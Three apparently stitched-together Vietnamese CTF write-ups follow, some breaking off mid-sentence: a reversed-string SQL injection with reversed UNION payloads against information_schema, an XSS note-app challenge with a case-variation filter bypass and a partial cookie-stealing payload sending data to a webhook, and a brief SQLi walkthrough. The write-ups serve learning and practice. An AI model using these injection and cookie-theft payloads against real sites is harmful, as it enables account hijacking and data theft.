Spycio.Kon

Hello mọi người vẫn là K0n vip pro đây :> lại là 1 chall khác, lần này liên quan đến lỗi si cồ in jec sần (SQL injection) mình có một trang vậy, test thử thôi Nhập thử dấu nháy đơn, có vẻ nó đã bị sao đó. Sau 1 hồi fuzz mình nhập thử iw thì thấy có kết quả trả về Có thể thấy iw là reverse của chữ wi có trong username. kết hợp với tên đề bài mình có thể đoán đoạn query như này SELECT id,username,email from users where username like " '% "+strrev($_GET['username'])+" %' " Ở đây mình sẽ sử dụng python giúp mình chuyển đổi cách câu lệnh thành rev kết quả thu được như sau, vậy là mình có thể SQl một cách dễ dàng. Payload: #'1'='1'ro' Mình muốn tìm xem có bao nhiêu cột: payload #4 yb redro' Xác nhận nó có 3 cột. Xác định nó đang dùng mysql nên dễ dàng tìm được databases của nó. Payload: #atamehcs.amehcs_noitamrofni morf eman_amehcs,llun,llun tceles noinu' Thấy database sqli khả nghi, thử tìm table. Và thấy 2 table là flag và

Pờ tít ver miền Bắc Mở bài: hế lô các bạn mình là K0n đây. Sau một chuỗi ngày tạch môn, lên voi xuống chóa thì tự dưng thấy pờ tít có giải cũng vui vui nên mình có tham gia thử. Rất cảm ơn các bạn đã tạo điều kiện cho mình được tham gia cùng. Thân bài: Chúng ta được cung cấp 2 link   +)link chall:  http://167.172.80.186:1337/   +)link bot:  http://167.172.80.186:7777/ Với kiểu này mình đoán sẽ liên quan đến lỗi xss, đây là một trong các lỗi cơ bản của mình học bảo mật. Đầu tiên là form login, hãy tạo 1 tài khoản để chơi thôi Mình đã có 1 tài khoản, chuyển hướng đến home mình thấy một creat note. Có lẽ đây là nơi có vuln. Tạo một script đơn giản: <script>alert(1)</script>, tag script đã bị filter. Có rất nhiều cách để bypass cái này nhưng mình sẽ chọn 1 cách đơn giản hơn. Sửa payload thành <scRIpt>alert(1)</scRIpt> nó bật lên cửa sổ, bây giờ mình tạo 1 cái webhook để lấy cookie và gửi cho admin Payload: <scRipt>var i = new Image;i.src="[link-hook]"

 Cookie ver beta :( đề bài là như này :DD, tui thử nhập số 1 thì nó ra như trên thay bằng nháy đơn :DD nó lỗi. Đại loại là query có vấn đề, cụ thể là dấu nháy đơn đã đóng nhưng lại lòi ra 1 thk nháy nữa chưa đóng :D có thể thấy nó chèn trực tiếp input mà không qua xử lý Kiểm tra số cột, t thấy nó trả về 3 cột :D bắt đầu kiểm tra các tables thấy có 1 table khả nghi ta thấy nó có một column flag khả nghi select nó để lấy flag